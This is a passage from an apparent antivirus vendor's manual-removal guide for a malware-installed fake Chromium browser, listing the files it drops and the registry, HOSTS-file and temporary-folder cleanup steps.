    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (38174 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):

    127.0.0.1 localhost

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
